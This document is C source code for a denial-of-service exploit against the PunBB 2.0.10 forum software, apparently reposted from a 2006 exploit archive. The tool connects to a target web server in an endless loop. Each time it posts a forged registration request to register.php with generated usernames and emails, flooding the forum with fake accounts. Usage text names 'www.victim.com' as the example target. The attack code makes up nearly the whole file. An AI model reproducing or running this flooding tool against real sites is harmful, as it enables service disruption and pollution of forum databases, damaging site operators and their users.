/*
Name: NST-Exploit Punbb 2.0.10 Denial Of Service
Copyright: NeoSecurity
Author: K4P0
[./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/
#################################################
PunBB 2.0.10 Denial of Service exploit by K4P0
Use only at your own reputation risk! ;)
www.NeoSecurityTeam.net
#################################################
[1] - Trying if connection is possible...
[2] - Connected!
[3] - Flooding localhost...
Use it at your own risk!.
*/
#define WINDOWS
//#define LINUX
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WINDOWS
#include <winsock2.h>
#include <windows.h>
// Link to (lib)ws2_32.a
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#endif
#define NST_ALIVE 1
int Connect(char*);
void SendPack(int, int, char*, char*);
void _perror(char*);
void HowTo(char*);
int main(int argc, char* argv[])
{
int vict_sock, dos = 0;
puts("#################################################");
puts(" PunBB 2.0.10 Denial of Service exploit by K4P0 ");
puts(" Use only at your own reputation risk! ;) \n");
puts(" www.NeoSecurityTeam.net ");
if(argc < 4) HowTo(argv[0]);
puts("#################################################\n");
printf("[1] - Trying if connection is possible...\n",
argv[1]);
fflush(stdout);
vict_sock = Connect(argv[2]);
printf("[2] - Connected!\n");
printf("[3] - Flooding %s", argv[1]);
#ifdef WINDOWS
closesocket(vict_sock);
#else
close(vict_sock);
#endif
while(NST_ALIVE)
{
if(!(dos % 10)) fprintf(stderr, ".");
vict_sock = Connect(argv[2]);
SendPack(vict_sock, dos, argv[3], argv[1]);
dos++;
#ifdef WINDOWS
closesocket(vict_sock);
WSACleanup();
#else
close(vict_sock);
#endif
}
return 0;
}
// I'm to lazy to use gethostby(addr|name) :)
int Connect(char* IP)
{
struct sockaddr_in *_addr;
int vict_sck;
#ifdef WINDOWS
WSADATA wsaData;
if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
//WSAGetLastError()? Nah...
fprintf(stderr, "[*] WSAStartup()
failed");
exit(-1);
}
#endif
if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in))))
{
fprintf(stderr, "[*] Unable to reserve
memory");
exit(-1);
}
memset(_addr, 0x0, sizeof(struct sockaddr_in));
_addr->sin_family = AF_INET;
_addr->sin_port = htons(80);
_addr->sin_addr.s_addr = inet_addr(IP);
#ifdef WINDOWS
if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0,
0)) < 0)
{
fprintf(stderr, "WSASocket() failed");
exit(-1);
}
else
if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
_perror("socket() ");
#endif
if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct
sockaddr)) < 0)
_perror("connect() ");
free(_addr);
return vict_sck;
}
void SendPack(int v_sck, int var, char* path, char* DNS)
{
char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST;
if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char
*)malloc(1024)) ||
!(HTTP_POST = (char *)malloc(512)))
{
fprintf(stderr, "Error trying to reserver
memory");
exit(-1);
}
sprintf(HTTP_PACK, "POST %sregister.php?action=register
HTTP/1.1\n"
"Host: %s\n"
"User-Agent: Mozilla/5.0 Gecko/20050511
Firefox/1.0.4\n"
"Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"
"Accept-Language:
es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n"
"Accept-Charset:
ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"
"Keep-Alive: 300\n"
"Proxy-Connection: keep-alive\n"
"Referer: http://%s%sregister.php\n"
"Content-Type:
application/x-www-form-urlencoded\n", path, DNS, DNS, path);
sprintf(HTTP_POST,
"form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&"
"req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var,
var);
sprintf(HTTP_MPCK, "Content-Length: %d\n\n",
strlen(HTTP_POST));
strcat(HTTP_PACK, HTTP_MPCK);
strcat(HTTP_PACK, HTTP_POST);
send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0);
free(HTTP_PACK);
free(HTTP_MPCK);
free(HTTP_POST);
return;
}
void _perror(char* msg)
{
perror(msg);
fflush(stdout);
exit(-1);
}
void HowTo(char* program)
{
fprintf(stderr, "%s <DNS> <IP> <Path>\n",
program);
fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6
/punbb/\n");
fprintf(stderr,
"#################################################");
exit(0);
}
securitydot.net - 2006-02-20
|
